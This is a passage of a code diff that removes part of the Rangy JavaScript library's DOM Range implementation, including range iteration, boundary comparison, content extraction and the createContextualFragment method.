- if (partiallySelected) {
- subIterator = iterator.getSubtreeIterator();
- node.appendChild(cloneSubtree(subIterator));
- subIterator.detach(true);
- }
-
- if (node.nodeType == 10) { // DocumentType
- throw new DOMException("HIERARCHY_REQUEST_ERR");
- }
- frag.appendChild(node);
- }
- return frag;
- }
-
- function iterateSubtree(rangeIterator, func, iteratorState) {
- var it, n;
- iteratorState = iteratorState || { stop: false };
- for (var node, subRangeIterator; node = rangeIterator.next(); ) {
- //log.debug("iterateSubtree, partially selected: " + rangeIterator.isPartiallySelectedSubtree(), nodeToString(node));
- if (rangeIterator.isPartiallySelectedSubtree()) {
- // The node is partially selected by the Range, so we can use a new RangeIterator on the portion of the
- // node selected by the Range.
- if (func(node) === false) {
- iteratorState.stop = true;
- return;
- } else {
- subRangeIterator = rangeIterator.getSubtreeIterator();
- iterateSubtree(subRangeIterator, func, iteratorState);
- subRangeIterator.detach(true);
- if (iteratorState.stop) {
- return;
- }
- }
- } else {
- // The whole node is selected, so we can use efficient DOM iteration to iterate over the node and its
- // descendant
- it = dom.createIterator(node);
- while ( (n = it.next()) ) {
- if (func(n) === false) {
- iteratorState.stop = true;
- return;
- }
- }
- }
- }
- }
-
- function deleteSubtree(iterator) {
- var subIterator;
- while (iterator.next()) {
- if (iterator.isPartiallySelectedSubtree()) {
- subIterator = iterator.getSubtreeIterator();
- deleteSubtree(subIterator);
- subIterator.detach(true);
- } else {
- iterator.remove();
- }
- }
- }
-
- function extractSubtree(iterator) {
-
- for (var node, frag = getRangeDocument(iterator.range).createDocumentFragment(), subIterator; node = iterator.next(); ) {
-
-
- if (iterator.isPartiallySelectedSubtree()) {
- node = node.cloneNode(false);
- subIterator = iterator.getSubtreeIterator();
- node.appendChild(extractSubtree(subIterator));
- subIterator.detach(true);
- } else {
- iterator.remove();
- }
- if (node.nodeType == 10) { // DocumentType
- throw new DOMException("HIERARCHY_REQUEST_ERR");
- }
- frag.appendChild(node);
- }
- return frag;
- }
-
- function getNodesInRange(range, nodeTypes, filter) {
- //log.info("getNodesInRange, " + nodeTypes.join(","));
- var filterNodeTypes = !!(nodeTypes && nodeTypes.length), regex;
- var filterExists = !!filter;
- if (filterNodeTypes) {
- regex = new RegExp("^(" + nodeTypes.join("|") + ")$");
- }
-
- var nodes = [];
- iterateSubtree(new RangeIterator(range, false), function(node) {
- if ((!filterNodeTypes || regex.test(node.nodeType)) && (!filterExists || filter(node))) {
- nodes.push(node);
- }
- });
- return nodes;
- }
-
- function inspect(range) {
- var name = (typeof range.getName == "undefined") ? "Range" : range.getName();
- return "[" + name + "(" + dom.inspectNode(range.startContainer) + ":" + range.startOffset + ", " +
- dom.inspectNode(range.endContainer) + ":" + range.endOffset + ")]";
- }
-
- /*----------------------------------------------------------------------------------------------------------------*/
-
- // RangeIterator code partially borrows from IERange by Tim Ryan (http://github.com/timcameronryan/IERange)
-
- /**
- * @constructor
- */
- function RangeIterator(range, clonePartiallySelectedTextNodes) {
- this.range = range;
- this.clonePartiallySelectedTextNodes = clonePartiallySelectedTextNodes;
-
-
-
- if (!range.collapsed) {
- this.sc = range.startContainer;
- this.so = range.startOffset;
- this.ec = range.endContainer;
- this.eo = range.endOffset;
- var root = range.commonAncestorContainer;
-
- if (this.sc === this.ec && dom.isCharacterDataNode(this.sc)) {
- this.isSingleCharacterDataNode = true;
- this._first = this._last = this._next = this.sc;
- } else {
- this._first = this._next = (this.sc === root && !dom.isCharacterDataNode(this.sc)) ?
- this.sc.childNodes[this.so] : dom.getClosestAncestorIn(this.sc, root, true);
- this._last = (this.ec === root && !dom.isCharacterDataNode(this.ec)) ?
- this.ec.childNodes[this.eo - 1] : dom.getClosestAncestorIn(this.ec, root, true);
- }
-
- }
- }
-
- RangeIterator.prototype = {
- _current: null,
- _next: null,
- _first: null,
- _last: null,
- isSingleCharacterDataNode: false,
-
- reset: function() {
- this._current = null;
- this._next = this._first;
- },
-
- hasNext: function() {
- return !!this._next;
- },
-
- next: function() {
- // Move to next node
- var current = this._current = this._next;
- if (current) {
- this._next = (current !== this._last) ? current.nextSibling : null;
-
- // Check for partially selected text nodes
- if (dom.isCharacterDataNode(current) && this.clonePartiallySelectedTextNodes) {
- if (current === this.ec) {
-
- (current = current.cloneNode(true)).deleteData(this.eo, current.length - this.eo);
- }
- if (this._current === this.sc) {
-
- (current = current.cloneNode(true)).deleteData(0, this.so);
- }
- }
- }
-
- return current;
- },
-
- remove: function() {
- var current = this._current, start, end;
-
- if (dom.isCharacterDataNode(current) && (current === this.sc || current === this.ec)) {
- start = (current === this.sc) ? this.so : 0;
- end = (current === this.ec) ? this.eo : current.length;
- if (start != end) {
- current.deleteData(start, end - start);
- }
- } else {
- if (current.parentNode) {
- current.parentNode.removeChild(current);
- } else {
-
- }
- }
- },
-
- // Checks if the current node is partially selected
- isPartiallySelectedSubtree: function() {
- var current = this._current;
- return isNonTextPartiallySelected(current, this.range);
- },
-
- getSubtreeIterator: function() {
- var subRange;
- if (this.isSingleCharacterDataNode) {
- subRange = this.range.cloneRange();
- subRange.collapse();
- } else {
- subRange = new Range(getRangeDocument(this.range));
- var current = this._current;
- var startContainer = current, startOffset = 0, endContainer = current, endOffset = dom.getNodeLength(current);
-
- if (dom.isAncestorOf(current, this.sc, true)) {
- startContainer = this.sc;
- startOffset = this.so;
- }
- if (dom.isAncestorOf(current, this.ec, true)) {
- endContainer = this.ec;
- endOffset = this.eo;
- }
-
- updateBoundaries(subRange, startContainer, startOffset, endContainer, endOffset);
- }
- return new RangeIterator(subRange, this.clonePartiallySelectedTextNodes);
- },
-
- detach: function(detachRange) {
- if (detachRange) {
- this.range.detach();
- }
- this.range = this._current = this._next = this._first = this._last = this.sc = this.so = this.ec = this.eo = null;
- }
- };
-
- /*----------------------------------------------------------------------------------------------------------------*/
-
- // Exceptions
-
- /**
- * @constructor
- */
- function RangeException(codeName) {
- this.code = this[codeName];
- this.codeName = codeName;
- this.message = "RangeException: " + this.codeName;
- }
-
- RangeException.prototype = {
- BAD_BOUNDARYPOINTS_ERR: 1,
- INVALID_NODE_TYPE_ERR: 2
- };
-
- RangeException.prototype.toString = function() {
- return this.message;
- };
-
- /*----------------------------------------------------------------------------------------------------------------*/
-
- /**
- * Currently iterates through all nodes in the range on creation until I think of a decent way to do it
- * TODO: Look into making this a proper iterator, not requiring preloading everything first
- * @constructor
- */
- function RangeNodeIterator(range, nodeTypes, filter) {
- this.nodes = getNodesInRange(range, nodeTypes, filter);
- this._next = this.nodes[0];
- this._position = 0;
- }
-
- RangeNodeIterator.prototype = {
- _current: null,
-
- hasNext: function() {
- return !!this._next;
- },
-
- next: function() {
- this._current = this._next;
- this._next = this.nodes[ ++this._position ];
- return this._current;
- },
-
- detach: function() {
- this._current = this._next = this.nodes = null;
- }
- };
-
- var beforeAfterNodeTypes = [1, 3, 4, 5, 7, 8, 10];
- var rootContainerNodeTypes = [2, 9, 11];
- var readonlyNodeTypes = [5, 6, 10, 12];
- var insertableNodeTypes = [1, 3, 4, 5, 7, 8, 10, 11];
- var surroundNodeTypes = [1, 3, 4, 5, 7, 8];
-
- function createAncestorFinder(nodeTypes) {
- return function(node, selfIsAncestor) {
- var t, n = selfIsAncestor ? node : node.parentNode;
- while (n) {
- t = n.nodeType;
- if (dom.arrayContains(nodeTypes, t)) {
- return n;
- }
- n = n.parentNode;
- }
- return null;
- };
- }
-
- var getRootContainer = dom.getRootContainer;
- var getDocumentOrFragmentContainer = createAncestorFinder( [9, 11] );
- var getReadonlyAncestor = createAncestorFinder(readonlyNodeTypes);
- var getDocTypeNotationEntityAncestor = createAncestorFinder( [6, 10, 12] );
-
- function assertNoDocTypeNotationEntityAncestor(node, allowSelf) {
- if (getDocTypeNotationEntityAncestor(node, allowSelf)) {
- throw new RangeException("INVALID_NODE_TYPE_ERR");
- }
- }
-
- function assertNotDetached(range) {
- if (!range.startContainer) {
- throw new DOMException("INVALID_STATE_ERR");
- }
- }
-
- function assertValidNodeType(node, invalidTypes) {
- if (!dom.arrayContains(invalidTypes, node.nodeType)) {
- throw new RangeException("INVALID_NODE_TYPE_ERR");
- }
- }
-
- function assertValidOffset(node, offset) {
- if (offset < 0 || offset > (dom.isCharacterDataNode(node) ? node.length : node.childNodes.length)) {
- throw new DOMException("INDEX_SIZE_ERR");
- }
- }
-
- function assertSameDocumentOrFragment(node1, node2) {
- if (getDocumentOrFragmentContainer(node1, true) !== getDocumentOrFragmentContainer(node2, true)) {
- throw new DOMException("WRONG_DOCUMENT_ERR");
- }
- }
-
- function assertNodeNotReadOnly(node) {
- if (getReadonlyAncestor(node, true)) {
- throw new DOMException("NO_MODIFICATION_ALLOWED_ERR");
- }
- }
-
- function assertNode(node, codeName) {
- if (!node) {
- throw new DOMException(codeName);
- }
- }
-
- function isOrphan(node) {
- return !dom.arrayContains(rootContainerNodeTypes, node.nodeType) && !getDocumentOrFragmentContainer(node, true);
- }
-
- function isValidOffset(node, offset) {
- return offset <= (dom.isCharacterDataNode(node) ? node.length : node.childNodes.length);
- }
-
- function assertRangeValid(range) {
- assertNotDetached(range);
- if (isOrphan(range.startContainer) || isOrphan(range.endContainer) ||
- !isValidOffset(range.startContainer, range.startOffset) ||
- !isValidOffset(range.endContainer, range.endOffset)) {
- throw new Error("Range error: Range is no longer valid after DOM mutation (" + range.inspect() + ")");
- }
- }
-
- /*----------------------------------------------------------------------------------------------------------------*/
-
- // Test the browser's innerHTML support to decide how to implement createContextualFragment
- var styleEl = document.createElement("style");
- var htmlParsingConforms = false;
- try {
- styleEl.innerHTML = "x";
- htmlParsingConforms = (styleEl.firstChild.nodeType == 3); // Opera incorrectly creates an element node
- } catch (e) {
- // IE 6 and 7 throw
- }
-
- api.features.htmlParsingConforms = htmlParsingConforms;
-
- var createContextualFragment = htmlParsingConforms ?
-
- // Implementation as per HTML parsing spec, trusting in the browser's implementation of innerHTML. See
- // discussion and base code for this implementation at issue 67.
- // Spec: http://html5.org/specs/dom-parsing.html#extensions-to-the-range-interface
- // Thanks to Aleks Williams.
- function(fragmentStr) {
- // "Let node the context object's start's node."
- var node = this.startContainer;
- var doc = dom.getDocument(node);
-
- // "If the context object's start's node is null, raise an INVALID_STATE_ERR
- // exception and abort these steps."
- if (!node) {
- throw new DOMException("INVALID_STATE_ERR");
- }
-
- // "Let element be as follows, depending on node's interface:"
- // Document, Document Fragment: null
- var el = null;
-
- // "Element: node"
- if (node.nodeType == 1) {
- el = node;
-
- // "Text, Comment: node's parentElement"
- } else if (dom.isCharacterDataNode(node)) {
- el = dom.parentElement(node);
- }
-
- // "If either element is null or element's ownerDocument is an HTML document
- // and element's local name is "html" and element's namespace is the HTML
- // namespace"
- if (el === null || (
- el.nodeName == "HTML"
- && dom.isHtmlNamespace(dom.getDocument(el).documentElement)
- && dom.isHtmlNamespace(el)
- )) {
-
- // "let element be a new Element with "body" as its local name and the HTML
- // namespace as its namespace.""
- el = doc.createElement("body");
- } else {
- el = el.cloneNode(false);
- }
-
- // "If the node's document is an HTML document: Invoke the HTML fragment parsing algorithm."
- // "If the node's document is an XML document: Invoke the XML fragment parsing algorithm."
- // "In either case, the algorithm must be invoked with fragment as the input
- // and element as the context element."
- el.innerHTML = fragmentStr;
-
- // "If this raises an exception, then abort these steps. Otherwise, let new
- // children be the nodes returned."
-
- // "Let fragment be a new DocumentFragment."
- // "Append all new children to fragment."
- // "Return fragment."
- return dom.fragmentFromNodeChildren(el);
- } :
-
- // In this case, innerHTML cannot be trusted, so fall back to a simpler, non-conformant implementation that
- // previous versions of Rangy used (with the exception of using a body element rather than a div)
- function(fragmentStr) {
- assertNotDetached(this);
- var doc = getRangeDocument(this);
- var el = doc.createElement("body");
- el.innerHTML = fragmentStr;
-
- return dom.fragmentFromNodeChildren(el);
- };
-
- /*----------------------------------------------------------------------------------------------------------------*/
-
- var rangeProperties = ["startContainer", "startOffset", "endContainer", "endOffset", "collapsed",
- "commonAncestorContainer"];
-
- var s2s = 0, s2e = 1, e2e = 2, e2s = 3;
- var n_b = 0, n_a = 1, n_b_a = 2, n_i = 3;
-
- function RangePrototype() {}
-
- RangePrototype.prototype = {
- attachListener: function(type, listener) {
- this._listeners[type].push(listener);
- },
-
- compareBoundaryPoints: function(how, range) {
- assertRangeValid(this);
- assertSameDocumentOrFragment(this.startContainer, range.startContainer);
-
- var nodeA, offsetA, nodeB, offsetB;
- var prefixA = (how == e2s || how == s2s) ? "start" : "end";
- var prefixB = (how == s2e || how == s2s) ? "start" : "end";
- nodeA = this[prefixA + "Container"];
- offsetA = this[prefixA + "Offset"];
- nodeB = range[prefixB + "Container"];
- offsetB = range[prefixB + "Offset"];
- return dom.comparePoints(nodeA, offsetA, nodeB, offsetB);
- },
-
- insertNode: function(node) {
- assertRangeValid(this);
- assertValidNodeType(node, insertableNodeTypes);
- assertNodeNotReadOnly(this.startContainer);
-
- if (dom.isAncestorOf(node, this.startContainer, true)) {
- throw new DOMException("HIERARCHY_REQUEST_ERR");
- }
-
- // No check for whether the container of the start of the Range is of a type that does not allow
- // children of the type of node: the browser's DOM implementation should do this for us when we attempt
- // to add the node
-
- var firstNodeInserted = insertNodeAtPosition(node, this.startContainer, this.startOffset);
- this.setStartBefore(firstNodeInserted);
- },
-
- cloneContents: function() {
- assertRangeValid(this);
-
- var clone, frag;
- if (this.collapsed) {
- return getRangeDocument(this).createDocumentFragment();
- } else {
- if (this.startContainer === this.endContainer && dom.isCharacterDataNode(this.startContainer)) {
- clone = this.startContainer.cloneNode(true);
- clone.data = clone.data.slice(this.startOffset, this.endOffset);
- frag = getRangeDocument(this).createDocumentFragment();
- frag.appendChild(clone);
- return frag;
- } else {
- var iterator = new RangeIterator(this, true);
- clone = cloneSubtree(iterator);
- iterator.detach();
- }
- return clone;
- }
- },
-
- canSurroundContents: function() {
- assertRangeValid(this);
- assertNodeNotReadOnly(this.startContainer);
- assertNodeNotReadOnly(this.endContainer);
-
- // Check if the contents can be surrounded. Specifically, this means whether the range partially selects
- // no non-text nodes.
- var iterator = new RangeIterator(this, true);
- var boundariesInvalid = (iterator._first && (isNonTextPartiallySelected(iterator._first, this)) ||
- (iterator._last && isNonTextPartiallySelected(iterator._last, this)));
- iterator.detach();
- return !boundariesInvalid;
- },
-
- surroundContents: function(node) {
- assertValidNodeType(node, surroundNodeTypes);
-
- if (!this.canSurroundContents()) {
- throw new RangeException("BAD_BOUNDARYPOINTS_ERR");
- }
-
- // Extract the contents
- var content = this.extractContents();
-
- // Clear the children of the node
- if (node.hasChildNodes()) {
- while (node.lastChild) {
- node.removeChild(node.lastChild);
- }
- }
-
- // Insert the new node and add the extracted contents
- insertNodeAtPosition(node, this.startContainer, this.startOffset);
- node.appendChild(content);
-
- this.selectNode(node);
- },
-
- cloneRange: function() {
- assertRangeValid(this);
- var range = new Range(getRangeDocument(this));
- var i = rangeProperties.length, prop;
- while (i--) {
- prop = rangeProperties[i];
- range[prop] = this[prop];
- }
- return range;
- },
-
- toString: function() {
- assertRangeValid(this);
- var sc = this.startContainer;
- if (sc === this.endContainer && dom.isCharacterDataNode(sc)) {
- return (sc.nodeType == 3 || sc.nodeType == 4) ? sc.data.slice(this.startOffset, this.endOffset) : "";
- } else {
- var textBits = [], iterator = new RangeIterator(this, true);
-
- iterateSubtree(iterator, function(node) {
- // Accept only text or CDATA nodes, not comments
-
- if (node.nodeType == 3 || node.nodeType == 4) {
- textBits.push(node.data);
- }
- });
- iterator.detach();
- return textBits.join("");
- }
- },
-
- // The methods below are all non-standard. The following batch were introduced by Mozilla but have since
- // been removed from Mozilla.
-
- compareNode: function(node) {
- assertRangeValid(this);
-
- var parent = node.parentNode;
- var nodeIndex = dom.getNodeIndex(node);
-
- if (!parent) {
- throw new DOMException("NOT_FOUND_ERR");
- }
-
- var startComparison = this.comparePoint(parent, nodeIndex),
- endComparison = this.comparePoint(parent, nodeIndex + 1);
-
- if (startComparison < 0) { // Node starts before
- return (endComparison > 0) ? n_b_a : n_b;
- } else {
- return (endComparison > 0) ? n_a : n_i;
- }
- },
-
- comparePoint: function(node, offset) {
- assertRangeValid(this);
- assertNode(node, "HIERARCHY_REQUEST_ERR");
- assertSameDocumentOrFragment(node, this.startContainer);
-
- if (dom.comparePoints(node, offset, this.startContainer, this.startOffset) < 0) {
- return -1;
- } else if (dom.comparePoints(node, offset, this.endContainer, this.endOffset) > 0) {
- return 1;
- }
- return 0;
- },
-
- createContextualFragment: createContextualFragment,
-
- toHtml: function() {
- assertRangeValid(this);
- var container = getRangeDocument(this).createElement("div");
- container.appendChild(this.cloneContents());
- return container.innerHTML;
- },
-
- // touchingIsIntersecting determines whether this method considers a node that borders a range intersects
- // with it (as in WebKit) or not (as in Gecko pre-1.9, and the default)
- intersectsNode: function(node, touchingIsIntersecting) {
- assertRangeValid(this);
- assertNode(node, "NOT_FOUND_ERR");
- if (dom.getDocument(node) !== getRangeDocument(this)) {
- return false;
- }
-
- var parent = node.parentNode, offset = dom.getNodeIndex(node);
- assertNode(parent, "NOT_FOUND_ERR");
-
- var startComparison = dom.comparePoints(parent, offset, this.endContainer, this.endOffset),
- endComparison = dom.comparePoints(parent, offset + 1, this.startContainer, this.startOffset);
-
- return touchingIsIntersecting ? startComparison <= 0 && endComparison >= 0 : startComparison < 0 && endComparison > 0;
- },
-
-
- isPointInRange: function(node, offset) {
- assertRangeValid(this);
- assertNode(node, "HIERARCHY_REQUEST_ERR");
- assertSameDocumentOrFragment(node, this.startContainer);
-
- return (dom.comparePoints(node, offset, this.startContainer, this.startOffset) >= 0) &&
- (dom.comparePoints(node, offset, this.endContainer, this.endOffset) <= 0);
- },
-
- // The methods below are non-standard and invented by me.
-
- // Sharing a boundary start-to-end or end-to-start does not count as intersection.
- intersectsRange: function(range, touchingIsIntersecting) {
- assertRangeValid(this);
-
- if (getRangeDocument(range) != getRangeDocument(this)) {
- throw new DOMException("WRONG_DOCUMENT_ERR");
- }
-
- var startComparison = dom.comparePoints(this.startContainer, this.startOffset, range.endContainer, range.endOffset),
- endComparison = dom.comparePoints(this.endContainer, this.endOffset, range.startContainer, range.startOffset);
-
- return touchingIsIntersecting ? startComparison <= 0 && endComparison >= 0 : startComparison < 0 && endComparison > 0;
- },
-
- intersection: function(range) {
- if (this.intersectsRange(range)) {
- var startComparison = dom.comparePoints(this.startContainer, this.startOffset, range.startContainer, range.startOffset),
- endComparison = dom.comparePoints(this.endContainer, this.endOffset, range.endContainer, range.endOffset);
-
- var intersectionRange = this.cloneRange();
-
- if (startComparison == -1) {
- intersectionRange.setStart(range.startContainer, range.startOffset);
- }
- if (endComparison == 1) {
- intersectionRange.setEnd(range.endContainer, range.endOffset);
- }
- return intersectionRange;
- }
- return null;
- },
-
- union: function(range) {
- if (this.intersectsRange(range, true)) {
- var unionRange = this.cloneRange();
- if (dom.comparePoints(range.startContainer, range.startOffset, this.startContainer, this.startOffset) == -1) {
- unionRange.setStart(range.startContainer, range.startOffset);
- }
- if (dom.comparePoints(range.endContainer, range.endOffset, this.endContainer, this.endOffset) == 1) {
- unionRange.setEnd(range.endContainer, range.endOffset);
- }
- return unionRange;
- } else {
- throw new RangeException("Ranges do not intersect");
- }
- },
-
- containsNode: function(node, allowPartial) {
- if (allowPartial) {
- return this.intersectsNode(node, false);
- } else {
- return this.compareNode(node) == n_i;
- }
- },
-
- containsNodeContents: function(node) {
- return this.comparePoint(node, 0) >= 0 && this.comparePoint(node, dom.getNodeLength(node)) <= 0;
- },
-
- containsRange: function(range) {
- return this.intersection(range).equals(range);
- },
-
- containsNodeText: function(node) {
- var nodeRange = this.cloneRange();
- nodeRange.selectNode(node);
- var textNodes = nodeRange.getNodes([3]);
- if (textNodes.length > 0) {
- nodeRange.setStart(textNodes[0], 0);
- var lastTextNode = textNodes.pop();
- nodeRange.setEnd(lastTextNode, lastTextNode.length);
- var contains = this.containsRange(nodeRange);
- nodeRange.detach();
- return contains;
- } else {
- return this.containsNodeContents(node);
- }
- },
-
- createNodeIterator: function(nodeTypes, filter) {
- assertRangeValid(this);
- return new RangeNodeIterator(this, nodeTypes, filter);
- },
-
- getNodes: function(nodeTypes, filter) {
- assertRangeValid(this);
- return getNodesInRange(this, nodeTypes, filter);
- },
-
- getDocument: function() {
- return getRangeDocument(this);
- },
-
- collapseBefore: function(node) {
- assertNotDetached(this);
-
- this.setEndBefore(node);
- this.collapse(false);
- },
-
- collapseAfter: function(node) {
- assertNotDetached(this);
-
- this.setStartAfter(node);
- this.collapse(true);
- },
-
- getName: function() {
- return "DomRange";
- },
-
- equals: function(range) {
- return Range.rangesEqual(this, range);
- },
-
- inspect: function() {
- return inspect(this);
- }
- };
-
- function copyComparisonConstantsToObject(obj) {
- obj.START_TO_START = s2s;
- obj.START_TO_END = s2e;
- obj.END_TO_END = e2e;
- obj.END_TO_START = e2s;
-
- obj.NODE_BEFORE = n_b;
- obj.NODE_AFTER = n_a;
- obj.NODE_BEFORE_AND_AFTER = n_b_a;
- obj.NODE_INSIDE = n_i;
- }
-
- function copyComparisonConstants(constructor) {
- copyComparisonConstantsToObject(constructor);
- copyComparisonConstantsToObject(constructor.prototype);
- }
-
- function createRangeContentRemover(remover, boundaryUpdater) {
- return function() {
- assertRangeValid(this);
-
- var sc = this.startContainer, so = this.startOffset, root = this.commonAncestorContainer;
-
- var iterator = new RangeIterator(this, true);
-
- // Work out where to position the range after content removal
- var node, boundary;
- if (sc !== root) {
- node = dom.getClosestAncestorIn(sc, root, true);
- boundary = getBoundaryAfterNode(node);
- sc = boundary.node;
- so = boundary.offset;
- }
-
- // Check none of the range is read-only
- iterateSubtree(iterator, assertNodeNotReadOnly);
-
- iterator.reset();
-
- // Remove the content
- var returnValue = remover(iterator);
- iterator.detach();
-
- // Move to the new position
- boundaryUpdater(this, sc, so, sc, so);
-
- return returnValue;
- };
- }
-
- function createPrototypeRange(constructor, boundaryUpdater, detacher) {
- function createBeforeAfterNodeSetter(isBefore, isStart) {
- return function(node) {
- assertNotDetached(this);
- assertValidNodeType(node, beforeAfterNodeTypes);
- assertValidNodeType(getRootContainer(node), rootContainerNodeTypes);
-
- var boundary = (isBefore ? getBoundaryBeforeNode : getBoundaryAfterNode)(node);
- (isStart ? setRangeStart : setRangeEnd)(this, boundary.node, boundary.offset);
- };
- }
-
- function setRangeStart(range, node, offset) {
- var ec = range.endContainer, eo = range.endOffset;
- if (node !== range.startContainer || offset !== range.startOffset) {
- // Check the root containers of the range and the new boundary, and also check whether the new boundary
- // is after the current end. In either case, collapse the range to the new position
- if (getRootContainer(node) != getRootContainer(ec) || dom.comparePoints(node, offset, ec, eo) == 1) {
- ec = node;
- eo = offset;
- }
- boundaryUpdater(range, node, offset, ec, eo);
- }
- }
-
- function setRangeEnd(range, node, offset) {
- var sc = range.startContainer, so = range.startOffset;
- if (node !== range.endContainer || offset !== range.endOffset) {
- // Check the root containers of the range and the new boundary, and also check whether the new boundary
- // is after the current end. In either case, collapse the range to the new position
- if (getRootContainer(node) != getRootContainer(sc) || dom.comparePoints(node, offset, sc, so) == -1) {
- sc = node;
- so = offset;
- }
- boundaryUpdater(range, sc, so, node, offset);
- }
- }
-
- function setRangeStartAndEnd(range, node, offset) {
- if (node !== range.startContainer || offset !== range.startOffset || node !== range.endContainer || offset !== range.endOffset) {
- boundaryUpdater(range, node, offset, node, offset);
- }
- }
-
- constructor.prototype = new RangePrototype();
-
- api.util.extend(constructor.prototype, {
- setStart: function(node, offset) {
- assertNotDetached(this);
- assertNoDocTypeNotationEntityAncestor(node, true);
- assertValidOffset(node, offset);
-
- setRangeStart(this, node, offset);
- },
-
- setEnd: function(node, offset) {
- assertNotDetached(this);
- assertNoDocTypeNotationEntityAncestor(node, true);
- assertValidOffset(node, offset);
-
- setRangeEnd(this, node, offset);
- },
-
- setStartBefore: createBeforeAfterNodeSetter(true, true),
- setStartAfter: createBeforeAfterNodeSetter(false, true),
- setEndBefore: createBeforeAfterNodeSetter(true, false),
- setEndAfter: createBeforeAfterNodeSetter(false, false),
-
- collapse: function(isStart) {
- assertRangeValid(this);
- if (isStart) {
- boundaryUpdater(this, this.startContainer, this.startOffset, this.startContainer, this.startOffset);
- } else {
- boundaryUpdater(this, this.endContainer, this.endOffset, this.endContainer, this.endOffset);
- }
- },
-
- selectNodeContents: function(node) {
- // This doesn't seem well specified: the spec talks only about selecting the node's contents, which
- // could be taken to mean only its children. However, browsers implement this the same as selectNode for
- // text nodes, so I shall do likewise
- assertNotDetached(this);
- assertNoDocTypeNotationEntityAncestor(node, true);
-
- boundaryUpdater(this, node, 0, node, dom.getNodeLength(node));
- },
-
- selectNode: function(node) {
- assertNotDetached(this);
- assertNoDocTypeNotationEntityAncestor(node, false);
- assertValidNodeType(node, beforeAfterNodeTypes);
-
- var start = getBoundaryBeforeNode(node), end = getBoundaryAfterNode(node);
- boundaryUpdater(this, start.node, start.offset, end.node, end.offset);
- },
-
- extractContents: createRangeContentRemover(extractSubtree, boundaryUpdater),
-
- deleteContents: createRangeContentRemover(deleteSubtree, boundaryUpdater),
-
- canSurroundContents: function() {
- assertRangeValid(this);
- assertNodeNotReadOnly(this.startContainer);
- assertNodeNotReadOnly(this.endContainer);
-
- // Check if the contents can be surrounded. Specifically, this means whether the range partially selects
- // no non-text nodes.
- var iterator = new RangeIterator(this, true);
- var boundariesInvalid = (iterator._first && (isNonTextPartiallySelected(iterator._first, this)) ||
- (iterator._last && isNonTextPartiallySelected(iterator._last, this)));
- iterator.detach();
- return !boundariesInvalid;
- },
-
- detach: function() {
- detacher(this);
- },
-
- splitBoundaries: function() {
- assertRangeValid(this);
-
-
- var sc = this.startContainer, so = this.startOffset, ec = this.endContainer, eo = this.endOffset;
- var startEndSame = (sc === ec);
-
- if (dom.isCharacterDataNode(ec) && eo > 0 && eo < ec.length) {
- dom.splitDataNode(ec, eo);
-
- }
-
- if (dom.isCharacterDataNode(sc) && so > 0 && so < sc.length) {
-
- sc = dom.splitDataNode(sc, so);
- if (startEndSame) {
- eo -= so;
- ec = sc;
- } else if (ec == sc.parentNode && eo >= dom.getNodeIndex(sc)) {
- eo++;
- }
- so = 0;
-
- }
- boundaryUpdater(this, sc, so, ec, eo);
- },
-
- normalizeBoundaries: function() {
- assertRangeValid(this);
-
- var sc = this.startContainer, so = this.startOffset, ec = this.endContainer, eo = this.endOffset;
-
- var mergeForward = function(node) {
- var sibling = node.nextSibling;
- if (sibling && sibling.nodeType == node.nodeType) {
- ec = node;
- eo = node.length;
- node.appendData(sibling.data);
- sibling.parentNode.removeChild(sibling);
- }
- };
-
- var mergeBackward = function(node) {
- var sibling = node.previousSibling;
- if (sibling && sibling.nodeType == node.nodeType) {
- sc = node;
- var nodeLength = node.length;
- so = sibling.length;
- node.insertData(0, sibling.data);
- sibling.parentNode.removeChild(sibling);
- if (sc == ec) {
- eo += so;
- ec = sc;
- } else if (ec == node.parentNode) {
- var nodeIndex = dom.getNodeIndex(node);
- if (eo == nodeIndex) {
- ec = node;
- eo = nodeLength;
- } else if (eo > nodeIndex) {
- eo--;
- }
- }
- }
- };
-
- var normalizeStart = true;
-
- if (dom.isCharacterDataNode(ec)) {
- if (ec.length == eo) {
- mergeForward(ec);
- }
- } else {
- if (eo > 0) {
- var endNode = ec.childNodes[eo - 1];
- if (endNode && dom.isCharacterDataNode(endNode)) {
- mergeForward(endNode);
- }
- }
- normalizeStart = !this.collapsed;
- }
-
- if (normalizeStart) {
- if (dom.isCharacterDataNode(sc)) {
- if (so == 0) {
- mergeBackward(sc);
- }
- } else {
- if (so < sc.childNodes.length) {
- var startNode = sc.childNodes[so];
- if (startNode && dom.isCharacterDataNode(startNode)) {
- mergeBackward(startNode);
- }
- }
- }
- } else {
- sc = ec;
- so = eo;
- }
-
- boundaryUpdater(this, sc, so, ec, eo);
- },
-
- collapseToPoint: function(node, offset) {
- assertNotDetached(this);
-
- assertNoDocTypeNotationEntityAncestor(node, true);
- assertValidOffset(node, offset);
-
- setRangeStartAndEnd(this, node, offset);
- }
- });
-
- copyComparisonConstants(constructor);
- }
-
- /*----------------------------------------------------------------------------------------------------------------*/
-
- // Updates commonAncestorContainer and collapsed after boundary change
- function updateCollapsedAndCommonAncestor(range) {
- range.collapsed = (range.startContainer === range.endContainer && range.startOffset === range.endOffset);
- range.commonAncestorContainer = range.collapsed ?
- range.startContainer : dom.getCommonAncestor(range.startContainer, range.endContainer);
- }
-
- function updateBoundaries(range, startContainer, startOffset, endContainer, endOffset) {
- var startMoved = (range.startContainer !== startContainer || range.startOffset !== startOffset);
- var endMoved = (range.endContainer !== endContainer || range.endOffset !== endOffset);
-
- range.startContainer = startContainer;
- range.startOffset = startOffset;
- range.endContainer = endContainer;
- range.endOffset = endOffset;
-
- updateCollapsedAndCommonAncestor(range);
- dispatchEvent(range, "boundarychange", {startMoved: startMoved, endMoved: endMoved});
- }
-
- function detach(range) {
- assertNotDetached(range);
- range.startContainer = range.startOffset = range.endContainer = range.endOffset = null;
- range.collapsed = range.commonAncestorContainer = null;
- dispatchEvent(range, "detach", null);
- range._listeners = null;
- }
-
- /**
- * @constructor
- */
- function Range(doc) {
- this.startContainer = doc;
- this.startOffset = 0;
- this.endContainer = doc;
- this.endOffset = 0;
- this._listeners = {
- boundarychange: [],
- detach: []
- };
- updateCollapsedAndCommonAncestor(this);
- }
-
- createPrototypeRange(Range, updateBoundaries, detach);
-
- api.rangePrototype = RangePrototype.prototype;
-
- Range.rangeProperties = rangeProperties;
- Range.RangeIterator = RangeIterator;
- Range.copyComparisonConstants = copyComparisonConstants;
- Range.createPrototypeRange = createPrototypeRange;
- Range.inspect = inspect;
- Range.getRangeDocument = getRangeDocument;
- Range.rangesEqual = function(r1, r2) {
- return r1.startContainer === r2.startContainer &&
- r1.startOffset === r2.startOffset &&
